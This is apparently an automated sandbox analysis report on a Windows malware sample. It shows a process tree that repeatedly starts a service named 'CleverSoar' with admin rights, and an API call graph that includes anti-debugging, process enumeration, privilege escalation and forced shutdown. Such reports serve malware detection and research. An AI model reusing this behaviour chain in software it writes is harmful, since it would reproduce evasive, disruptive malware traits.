                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7934f0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:23:03:23
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff6a23f0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:23:03:24
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:23:03:24
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff675520000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true


                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.8%
                              Total number of Nodes:778
                              Total number of Limit Nodes:10
100420->100422 100456 6c2f0120 18 API calls __cftoe 100421->100456 100426 6c2efd78 100422->100426 100442 6c2fae0c 100422->100442 100426->100413 100430->100415 100432 6c2f0b24 __wsopen_s 100431->100432 100433 6c2f0b2e 100432->100433 100434 6c2f0b43 100432->100434 100580 6c2f0120 18 API calls __cftoe 100433->100580 100438 6c2f0b3e 100434->100438 100565 6c2ec5a9 EnterCriticalSection 100434->100565 100437 6c2f0b60 100566 6c2f0b9c 100437->100566 100438->100417 100440 6c2f0b6b 100581 6c2f0b92 LeaveCriticalSection 100440->100581 100443 6c2fae18 __wsopen_s 100442->100443 100458 6c2f039f EnterCriticalSection 100443->100458 100445 6c2fae26 100459 6c2faeb0 100445->100459 100450 6c2faf72 100451 6c2fb091 100450->100451 100483 6c2fb114 100451->100483 100454 6c2efdcc 100457 6c2efdf5 LeaveCriticalSection 100454->100457 100456->100426 100457->100426 100458->100445 100467 6c2faed3 100459->100467 100460 6c2fae33 100473 6c2fae6c 100460->100473 100461 6c2faf2b 100478 6c2f71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100461->100478 100463 6c2faf34 100479 6c2f47bb HeapFree GetLastError __dosmaperr 100463->100479 100466 6c2faf3d 100466->100460 100480 6c2f6c1f 6 API calls std::_Lockit::_Lockit 100466->100480 100467->100460 100467->100461 100467->100467 100476 6c2ec5a9 EnterCriticalSection 100467->100476 100477 6c2ec5bd LeaveCriticalSection 100467->100477 100470 6c2faf5c 100481 6c2ec5a9 EnterCriticalSection 100470->100481 100472 6c2faf6f 100472->100460 100482 6c2f03b6 LeaveCriticalSection 100473->100482 100475 6c2efda3 100475->100426 100475->100450 100476->100467 100477->100467 100478->100463 100479->100466 100480->100470 100481->100472 100482->100475 100484 6c2fb133 100483->100484 100485 6c2fb146 100484->100485 100489 6c2fb15b 100484->100489 100499 6c2f0120 18 API calls __cftoe 100485->100499 100487 6c2fb0a7 100487->100454 100496 6c303fde 100487->100496 100494 6c2fb27b 100489->100494 100500 6c303ea8 37 API calls __cftoe 100489->100500 100491 
6c2fb2cb 100491->100494 100501 6c303ea8 37 API calls __cftoe 100491->100501 100493 6c2fb2e9 100493->100494 100502 6c303ea8 37 API calls __cftoe 100493->100502 100494->100487 100503 6c2f0120 18 API calls __cftoe 100494->100503 100504 6c304396 100496->100504 100499->100487 100500->100491 100501->100493 100502->100494 100503->100487 100505 6c3043a2 __wsopen_s 100504->100505 100506 6c3043a9 100505->100506 100507 6c3043d4 100505->100507 100522 6c2f0120 18 API calls __cftoe 100506->100522 100513 6c303ffe 100507->100513 100512 6c303ff9 100512->100454 100524 6c2f06cb 100513->100524 100518 6c304034 100520 6c304066 100518->100520 100564 6c2f47bb HeapFree GetLastError __dosmaperr 100518->100564 100523 6c30442b LeaveCriticalSection __wsopen_s 100520->100523 100522->100512 100523->100512 100525 6c2ebceb __cftoe 37 API calls 100524->100525 100526 6c2f06dd 100525->100526 100527 6c2f06ef 100526->100527 100528 6c2f69d5 __wsopen_s 5 API calls 100526->100528 100529 6c2ebdf6 100527->100529 100528->100527 100530 6c2ebe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100529->100530 100531 6c2ebe0e 100530->100531 100531->100518 100532 6c30406c 100531->100532 100533 6c3044ec __wsopen_s 18 API calls 100532->100533 100534 6c304089 100533->100534 100535 6c30160c __wsopen_s 14 API calls 100534->100535 100538 6c30409e __dosmaperr 100534->100538 100536 6c3040bc 100535->100536 100537 6c304457 __wsopen_s CreateFileW 100536->100537 100536->100538 100543 6c304115 100537->100543 100538->100518 100539 6c304192 GetFileType 100540 6c3041e4 100539->100540 100541 6c30419d GetLastError 100539->100541 100547 6c3017b0 __wsopen_s SetStdHandle 100540->100547 100544 6c2ef9f2 __dosmaperr 100541->100544 100542 6c304167 GetLastError 100542->100538 100543->100539 100543->100542 100545 6c304457 __wsopen_s CreateFileW 100543->100545 100546 6c3041ab CloseHandle 100544->100546 100548 6c30415a 100545->100548 100546->100538 100561 6c3041d4 100546->100561 100549 6c304205 100547->100549 100548->100539 
100548->100542 100550 6c304251 100549->100550 100551 6c304666 __wsopen_s 70 API calls 100549->100551 100552 6c304710 __wsopen_s 70 API calls 100550->100552 100554 6c304258 100550->100554 100551->100550 100553 6c304286 100552->100553 100553->100554 100555 6c304294 100553->100555 100556 6c2fb925 __wsopen_s 21 API calls 100554->100556 100555->100538 100557 6c304310 CloseHandle 100555->100557 100556->100538 100558 6c304457 __wsopen_s CreateFileW 100557->100558 100559 6c30433b 100558->100559 100560 6c304345 GetLastError 100559->100560 100559->100561 100562 6c304351 __dosmaperr 100560->100562 100561->100538 100563 6c30171f __wsopen_s SetStdHandle 100562->100563 100563->100561 100564->100520 100565->100437 100567 6c2f0bbe 100566->100567 100568 6c2f0ba9 100566->100568 100571 6c2f0bb9 100567->100571 100582 6c2f0cb9 100567->100582 100604 6c2f0120 18 API calls __cftoe 100568->100604 100571->100440 100576 6c2f0be1 100597 6c2fb898 100576->100597 100578 6c2f0be7 100578->100571 100605 6c2f47bb HeapFree GetLastError __dosmaperr 100578->100605 100580->100438 100581->100438 100583 6c2f0cd1 100582->100583 100587 6c2f0bd3 100582->100587 100584 6c2f9c60 18 API calls 100583->100584 100583->100587 100585 6c2f0cef 100584->100585 100606 6c2fbb6c 100585->100606 100588 6c2f873e 100587->100588 100589 6c2f0bdb 100588->100589 100590 6c2f8755 100588->100590 100592 6c2f9c60 100589->100592 100590->100589 100662 6c2f47bb HeapFree GetLastError __dosmaperr 100590->100662 100593 6c2f9c81 100592->100593 100594 6c2f9c6c 100592->100594 100593->100576 100663 6c2f0120 18 API calls __cftoe 100594->100663 100596 6c2f9c7c 100596->100576 100598 6c2fb8be 100597->100598 100602 6c2fb8a9 __dosmaperr 100597->100602 100599 6c2fb8e5 100598->100599 100600 6c2fb907 __dosmaperr 100598->100600 100664 6c2fb9c1 100599->100664 100672 6c2f0120 18 API calls __cftoe 100600->100672 100602->100578 100604->100571 100605->100571 100607 6c2fbb78 __wsopen_s 100606->100607 100608 6c2fbbca 100607->100608 100609 6c2fbc33 __dosmaperr 
100607->100609 100613 6c2fbb80 __dosmaperr 100607->100613 100617 6c301990 EnterCriticalSection 100608->100617 100647 6c2f0120 18 API calls __cftoe 100609->100647 100611 6c2fbbd0 100615 6c2fbbec __dosmaperr 100611->100615 100618 6c2fbc5e 100611->100618 100613->100587 100646 6c2fbc2b LeaveCriticalSection __wsopen_s 100615->100646 100617->100611 100619 6c2fbc80 100618->100619 100645 6c2fbc9c __dosmaperr 100618->100645 100620 6c2fbcd4 100619->100620 100621 6c2fbc84 __dosmaperr 100619->100621 100622 6c2fbce7 100620->100622 100656 6c2fac69 20 API calls __wsopen_s 100620->100656 100655 6c2f0120 18 API calls __cftoe 100621->100655 100648 6c2fbe40 100622->100648 100627 6c2fbcfd 100629 6c2fbd26 100627->100629 100630 6c2fbd01 100627->100630 100628 6c2fbd3c 100631 6c2fbd95 WriteFile 100628->100631 100632 6c2fbd50 100628->100632 100658 6c2fbeb1 43 API calls 5 library calls 100629->100658 100630->100645 100657 6c2fc25b 6 API calls __wsopen_s 100630->100657 100634 6c2fbdb9 GetLastError 100631->100634 100631->100645 100635 6c2fbd5b 100632->100635 100636 6c2fbd85 100632->100636 100634->100645 100639 6c2fbd75 100635->100639 100640 6c2fbd60 100635->100640 100661 6c2fc2c3 7 API calls 2 library calls 100636->100661 100660 6c2fc487 8 API calls 3 library calls 100639->100660 100643 6c2fbd65 100640->100643 100640->100645 100642 6c2fbd73 100642->100645 100659 6c2fc39e 7 API calls 2 library calls 100643->100659 100645->100615 100646->100613 100647->100613 100649 6c3019e5 __wsopen_s 18 API calls 100648->100649 100650 6c2fbe51 100649->100650 100651 6c2fbcf8 100650->100651 100652 6c2f49b2 __Getctype 37 API calls 100650->100652 100651->100627 100651->100628 100653 6c2fbe74 100652->100653 100653->100651 100654 6c2fbe8e GetConsoleMode 100653->100654 100654->100651 100655->100645 100656->100622 100657->100645 100658->100645 100659->100642 100660->100642 100661->100642 100662->100589 100663->100596 100665 6c2fb9cd __wsopen_s 100664->100665 100673 6c301990 EnterCriticalSection 100665->100673 100667 
6c2fb9db 100669 6c2fba08 100667->100669 100674 6c2fb925 100667->100674 100687 6c2fba41 LeaveCriticalSection __wsopen_s 100669->100687 100671 6c2fba2a 100671->100602 100672->100602 100673->100667 100688 6c3015a2 100674->100688 100676 6c2fb935 100677 6c2fb93b 100676->100677 100679 6c3015a2 __wsopen_s 18 API calls 100676->100679 100686 6c2fb96d 100676->100686 100693 6c30171f SetStdHandle __dosmaperr __wsopen_s 100677->100693 100681 6c2fb964 100679->100681 100680 6c3015a2 __wsopen_s 18 API calls 100682 6c2fb979 CloseHandle 100680->100682 100684 6c3015a2 __wsopen_s 18 API calls 100681->100684 100682->100677 100685 6c2fb985 GetLastError 100682->100685 100683 6c2fb993 __dosmaperr 100683->100669 100684->100686 100685->100677 100686->100677 100686->100680 100687->100671 100690 6c3015c4 __dosmaperr 100688->100690 100691 6c3015af __dosmaperr 100688->100691 100689 6c3015e9 100689->100676 100690->100689 100692 6c2f0120 __cftoe 18 API calls 100690->100692 100691->100676 100692->100691 100693->100683 100694->100287 100695->100289 100696->100291 100698 6c2e65dc 100697->100698 100699 6c2e6608 100697->100699 100700 6c2e6601 100698->100700 100720 6c1b2250 30 API calls 100698->100720 100706 6c2e6619 100699->100706 100718 6c1b3560 32 API calls std::_Xinvalid_argument 100699->100718 100700->100300 100703 6c2e67e8 100721 6c1b2340 24 API calls 100703->100721 100705 6c2e67f7 100722 6c2e9379 RaiseException 100705->100722 100706->100700 100719 6c1b2f60 42 API calls 4 library calls 100706->100719 100709 6c2e6653 100709->100700 100723 6c1b2250 30 API calls 100709->100723 100711 6c2e6827 100724 6c1b2340 24 API calls 100711->100724 100713 6c2e683d 100725 6c2e9379 RaiseException 100713->100725 100715->100300 100716->100300 100717->100300 100718->100706 100719->100709 100720->100703 100721->100705 100722->100709 100723->100711 100724->100713 100725->100700 100726->100306 100727->100309 100728->100306 100729->100306 100730->100306 100732 6c1b022e 100731->100732 100733 6c1b04d6 100732->100733 100738 
6c2f17db 100732->100738 100733->100319 100735->100320 100736->100322 100737->100324 100739 6c2f17e9 100738->100739 100740 6c2f1806 100738->100740 100739->100740 100741 6c2f180a 100739->100741 100744 6c2f17f6 100739->100744 100740->100732 100746 6c2f1a02 100741->100746 100754 6c2f0120 18 API calls __cftoe 100744->100754 100747 6c2f1a0e __wsopen_s 100746->100747 100755 6c2ec5a9 EnterCriticalSection 100747->100755 100749 6c2f1a1c 100756 6c2f19bf 100749->100756 100753 6c2f183c 100753->100732 100754->100740 100755->100749 100764 6c2f85a6 100756->100764 100762 6c2f19f9 100763 6c2f1a51 LeaveCriticalSection 100762->100763 100763->100753 100765 6c2f9c60 18 API calls 100764->100765 100766 6c2f85b7 100765->100766 100781 6c3019e5 100766->100781 100768 6c2f85bd __wsopen_s 100769 6c2f19d3 100768->100769 100786 6c2f47bb HeapFree GetLastError __dosmaperr 100768->100786 100771 6c2f183e 100769->100771 100773 6c2f1850 100771->100773 100775 6c2f186e 100771->100775 100772 6c2f185e 100788 6c2f0120 18 API calls __cftoe 100772->100788 100773->100772 100773->100775 100778 6c2f1886 _Yarn 100773->100778 100780 6c2f8659 62 API calls 100775->100780 100776 6c2f0cb9 62 API calls 100776->100778 100777 6c2f9c60 18 API calls 100777->100778 100778->100775 100778->100776 100778->100777 100779 6c2fbb6c __wsopen_s 62 API calls 100778->100779 100779->100778 100780->100762 100783 6c3019f2 100781->100783 100784 6c3019ff 100781->100784 100782 6c301a0b 100782->100768 100783->100768 100784->100782 100787 6c2f0120 18 API calls __cftoe 100784->100787 100786->100769 100787->100783 100788->100775 100789->100341 100790->100343 100791->100345 100792->100241 100793->100249 100794->100251 100795->100245 100796->100248 100797 6c2eef3f 100798 6c2eef4b __wsopen_s 100797->100798 100799 6c2eef5f 100798->100799 100800 6c2eef52 GetLastError ExitThread 100798->100800 100809 6c2f49b2 GetLastError 100799->100809 100806 6c2eef7b 100842 6c2eeeaa 16 API calls 2 library calls 100806->100842 100808 6c2eef9d 100810 6c2f49c9 
100809->100810 100811 6c2f49cf 100809->100811 100843 6c2f6b23 6 API calls std::_Lockit::_Lockit 100810->100843 100815 6c2f49d5 SetLastError 100811->100815 100844 6c2f6b62 6 API calls std::_Lockit::_Lockit 100811->100844 100814 6c2f49ed 100814->100815 100816 6c2f49f1 100814->100816 100822 6c2f4a69 100815->100822 100823 6c2eef64 100815->100823 100845 6c2f71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100816->100845 100818 6c2f49fd 100820 6c2f4a1c 100818->100820 100821 6c2f4a05 100818->100821 100848 6c2f6b62 6 API calls std::_Lockit::_Lockit 100820->100848 100846 6c2f6b62 6 API calls std::_Lockit::_Lockit 100821->100846 100851 6c2f0ac9 37 API calls std::locale::_Setgloballocale 100822->100851 100836 6c2f9d66 100823->100836 100827 6c2f4a13 100847 6c2f47bb HeapFree GetLastError __dosmaperr 100827->100847 100829 6c2f4a28 100830 6c2f4a3d 100829->100830 100831 6c2f4a2c 100829->100831 100850 6c2f47bb HeapFree GetLastError __dosmaperr 100830->100850 100849 6c2f6b62 6 API calls std::_Lockit::_Lockit 100831->100849 100834 6c2f4a19 100834->100815 100837 6c2f9d78 GetPEB 100836->100837 100840 6c2eef6f 100836->100840 100838 6c2f9d8b 100837->100838 100837->100840 100852 6c2f6e18 5 API calls std::_Lockit::_Lockit 100838->100852 100840->100806 100841 6c2f6d6f 5 API calls std::_Lockit::_Lockit 100840->100841 100841->100806 100842->100808 100843->100811 100844->100814 100845->100818 100846->100827 100847->100834 100848->100829 100849->100827 100850->100834 100852->100840 100853 6c163d62 100855 6c163bc0 100853->100855 100854 6c163e8a GetCurrentThread NtSetInformationThread 100856 6c163eea 100854->100856 100855->100854 100857 6c164b53 100858 6c2e6a43 std::_Facet_Register 4 API calls 100857->100858 100859 6c164b5c _Yarn 100858->100859 100860 6c2daec0 2 API calls 100859->100860 100865 6c164bae std::ios_base::_Ios_base_dtor 100860->100865 100861 6c18639e 101048 6c2f0130 18 API calls 2 library calls 100861->101048 100863 6c164cff 100864 6c165164 
CreateFileA CloseHandle 100869 6c1651ec 100864->100869 100865->100861 100865->100863 100865->100864 100866 6c17245a _Yarn _strlen 100865->100866 100866->100861 100867 6c2daec0 2 API calls 100866->100867 100873 6c172a83 std::ios_base::_Ios_base_dtor 100867->100873 101015 6c2e5120 OpenSCManagerA 100869->101015 100870 6c16fc00 101041 6c2e5240 CreateToolhelp32Snapshot 100870->101041 100871 6c1863b2 101049 6c1615e0 18 API calls std::ios_base::_Ios_base_dtor 100871->101049 100873->100861 101019 6c2d0390 100873->101019 100876 6c2e6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100909 6c165478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100876->100909 100878 6c1737d0 Sleep 100921 6c1737e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100878->100921 100879 6c2daec0 2 API calls 100879->100909 100880 6c2e5240 4 API calls 100898 6c17053a 100880->100898 100881 6c2e5240 4 API calls 100905 6c1712e2 100881->100905 100883 6c16ffe3 100883->100880 100893 6c170abc 100883->100893 100884 6c1864f8 100885 6c186ba0 104 API calls 100885->100909 100886 6c186e60 32 API calls 100886->100909 100888 6c2e5240 4 API calls 100888->100893 100889 6c187090 77 API calls 100889->100909 100890 6c2e5240 4 API calls 100911 6c171dd9 100890->100911 100891 6c166722 101038 6c2e1880 25 API calls 4 library calls 100891->101038 100892 6c17211c 100892->100866 100894 6c17241a 100892->100894 100893->100866 100893->100881 100897 6c2d0390 11 API calls 100894->100897 100895 6c2daec0 2 API calls 100895->100921 100896 6c1ae010 67 API calls 100896->100909 100899 6c17244d 100897->100899 100898->100888 100898->100893 101047 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100899->101047 100901 6c172452 Sleep 100901->100866 100902 6c166162 100903 6c16740b 100904 6c2e4ff0 4 API calls 100903->100904 100913 6c16775a _strlen 100904->100913 100905->100890 100905->100892 100914 6c1716ac 100905->100914 100906 
6c2e5240 4 API calls 100906->100892 100907 6c186ba0 104 API calls 100907->100921 100909->100861 100909->100870 100909->100876 100909->100879 100909->100885 100909->100886 100909->100889 100909->100891 100909->100896 100909->100902 100910 6c187090 77 API calls 100910->100921 100911->100892 100911->100906 100912 6c1ae010 67 API calls 100912->100921 100913->100861 100915 6c167b92 100913->100915 100916 6c167ba9 100913->100916 100919 6c167b43 _Yarn 100913->100919 100917 6c2e6a43 std::_Facet_Register 4 API calls 100915->100917 100918 6c2e6a43 std::_Facet_Register 4 API calls 100916->100918 100917->100919 100918->100919 100920 6c2daec0 2 API calls 100919->100920 100930 6c167be7 std::ios_base::_Ios_base_dtor 100920->100930 100921->100861 100921->100895 100921->100907 100921->100910 100921->100912 101028 6c186e60 100921->101028 100922 6c2e4ff0 4 API calls 100933 6c168a07 100922->100933 100923 6c169d7f 100927 6c2e6a43 std::_Facet_Register 4 API calls 100923->100927 100924 6c169d68 100926 6c2e6a43 std::_Facet_Register 4 API calls 100924->100926 100925 6c16962c _strlen 100925->100861 100925->100923 100925->100924 100928 6c169d18 _Yarn 100925->100928 100926->100928 100927->100928 100929 6c2daec0 2 API calls 100928->100929 100937 6c169dbd std::ios_base::_Ios_base_dtor 100929->100937 100930->100861 100930->100922 100930->100925 100931 6c168387 100930->100931 100932 6c2e4ff0 4 API calls 100941 6c169120 100932->100941 100933->100932 100934 6c2e4ff0 4 API calls 100951 6c16a215 _strlen 100934->100951 100935 6c2e4ff0 4 API calls 100936 6c169624 100935->100936 101039 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100936->101039 100937->100861 100937->100934 100942 6c16e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100937->100942 100938 6c2e6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100938->100942 100940 6c2daec0 2 API calls 100940->100942 100941->100935 
100942->100861 100942->100938 100942->100940 100943 6c16ed02 Sleep 100942->100943 100944 6c16f7b1 100942->100944 100963 6c16e8c1 100943->100963 101040 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100944->101040 100946 6c16e8dd GetCurrentProcess TerminateProcess 100946->100942 100947 6c16a9a4 100949 6c2e6a43 std::_Facet_Register 4 API calls 100947->100949 100948 6c16a9bb 100950 6c2e6a43 std::_Facet_Register 4 API calls 100948->100950 100960 6c16a953 _Yarn _strlen 100949->100960 100950->100960 100951->100861 100951->100947 100951->100948 100951->100960 100952 6c2e4ff0 4 API calls 100952->100963 100953 6c16fbb8 100955 6c16fbe8 ExitWindowsEx Sleep 100953->100955 100954 6c16f7c0 100954->100953 100955->100870 100956 6c16aff0 100958 6c2e6a43 std::_Facet_Register 4 API calls 100956->100958 100957 6c16b009 100959 6c2e6a43 std::_Facet_Register 4 API calls 100957->100959 100961 6c16afa0 _Yarn 100958->100961 100959->100961 100960->100871 100960->100956 100960->100957 100960->100961 100962 6c2e5960 104 API calls 100961->100962 100964 6c16b059 std::ios_base::_Ios_base_dtor _strlen 100962->100964 100963->100942 100963->100946 100963->100952 100964->100861 100965 6c16b443 100964->100965 100966 6c16b42c 100964->100966 100969 6c16b3da _Yarn _strlen 100964->100969 100968 6c2e6a43 std::_Facet_Register 4 API calls 100965->100968 100967 6c2e6a43 std::_Facet_Register 4 API calls 100966->100967 100967->100969 100968->100969 100969->100871 100970 6c16b7b7 100969->100970 100971 6c16b79e 100969->100971 100974 6c16b751 _Yarn 100969->100974 100973 6c2e6a43 std::_Facet_Register 4 API calls 100970->100973 100972 6c2e6a43 std::_Facet_Register 4 API calls 100971->100972 100972->100974 100973->100974 100975 6c2e5960 104 API calls 100974->100975 100976 6c16b804 std::ios_base::_Ios_base_dtor _strlen 100975->100976 100976->100861 100977 6c16bc26 100976->100977 100978 6c16bc0f 100976->100978 100981 6c16bbbd _Yarn _strlen 100976->100981 
100980 6c2e6a43 std::_Facet_Register 4 API calls 100977->100980 100979 6c2e6a43 std::_Facet_Register 4 API calls 100978->100979 100979->100981 100980->100981 100981->100871 100982 6c16c075 100981->100982 100983 6c16c08e 100981->100983 100986 6c16c028 _Yarn 100981->100986 100984 6c2e6a43 std::_Facet_Register 4 API calls 100982->100984 100985 6c2e6a43 std::_Facet_Register 4 API calls 100983->100985 100984->100986 100985->100986 100987 6c2e5960 104 API calls 100986->100987 100992 6c16c0db std::ios_base::_Ios_base_dtor _strlen 100987->100992 100988 6c16c7a5 100990 6c2e6a43 std::_Facet_Register 4 API calls 100988->100990 100989 6c16c7bc 100991 6c2e6a43 std::_Facet_Register 4 API calls 100989->100991 100999 6c16c753 _Yarn _strlen 100990->100999 100991->100999 100992->100861 100992->100988 100992->100989 100992->100999 100993 6c16d406 100996 6c2e6a43 std::_Facet_Register 4 API calls 100993->100996 100994 6c16d3ed 100995 6c2e6a43 std::_Facet_Register 4 API calls 100994->100995 100997 6c16d39a _Yarn 100995->100997 100996->100997 100998 6c2e5960 104 API calls 100997->100998 101000 6c16d458 std::ios_base::_Ios_base_dtor _strlen 100998->101000 100999->100871 100999->100993 100999->100994 100999->100997 101005 6c16cb2f 100999->101005 101000->100861 101001 6c16d8a4 101000->101001 101002 6c16d8bb 101000->101002 101006 6c16d852 _Yarn _strlen 101000->101006 101003 6c2e6a43 std::_Facet_Register 4 API calls 101001->101003 101004 6c2e6a43 std::_Facet_Register 4 API calls 101002->101004 101003->101006 101004->101006 101006->100871 101007 6c16dcb6 101006->101007 101008 6c16dccf 101006->101008 101011 6c16dc69 _Yarn 101006->101011 101009 6c2e6a43 std::_Facet_Register 4 API calls 101007->101009 101010 6c2e6a43 std::_Facet_Register 4 API calls 101008->101010 101009->101011 101010->101011 101012 6c2e5960 104 API calls 101011->101012 101014 6c16dd1c std::ios_base::_Ios_base_dtor 101012->101014 101013 6c2e4ff0 4 API calls 101013->100942 101014->100861 101014->101013 101017 6c2e5156 
101015->101017 101016 6c2e51e8 OpenServiceA 101016->101017 101017->101016 101018 6c2e522f 101017->101018 101018->100909 101021 6c2d03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101019->101021 101020 6c2d3f5f CloseHandle 101020->101021 101021->101020 101022 6c2d310e CloseHandle 101021->101022 101023 6c2d251b CloseHandle 101021->101023 101024 6c1737cb 101021->101024 101025 6c2bc1e0 WriteFile WriteFile WriteFile ReadFile 101021->101025 101050 6c2bb730 101021->101050 101022->101021 101023->101021 101027 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101024->101027 101025->101021 101027->100878 101029 6c186e9f 101028->101029 101035 6c186eb3 101029->101035 101061 6c1b3560 32 API calls std::_Xinvalid_argument 101029->101061 101033 6c186f6e 101033->100921 101034 6c186f5b 101034->101033 101062 6c1b37e0 32 API calls std::_Xinvalid_argument 101034->101062 101035->101034 101063 6c1b2250 30 API calls 101035->101063 101064 6c1b26e0 24 API calls 4 library calls 101035->101064 101065 6c2e9379 RaiseException 101035->101065 101038->100903 101039->100925 101040->100954 101042 6c2e52a0 std::locale::_Setgloballocale 101041->101042 101043 6c2e5277 CloseHandle 101042->101043 101044 6c2e5320 Process32NextW 101042->101044 101045 6c2e53b1 101042->101045 101046 6c2e5345 Process32FirstW 101042->101046 101043->101042 101044->101042 101045->100883 101046->101042 101047->100901 101049->100884 101051 6c2bb743 _Yarn __wsopen_s std::locale::_Setgloballocale 101050->101051 101052 6c2bc180 101051->101052 101053 6c2bbced CreateFileA 101051->101053 101055 6c2baa30 101051->101055 101052->101021 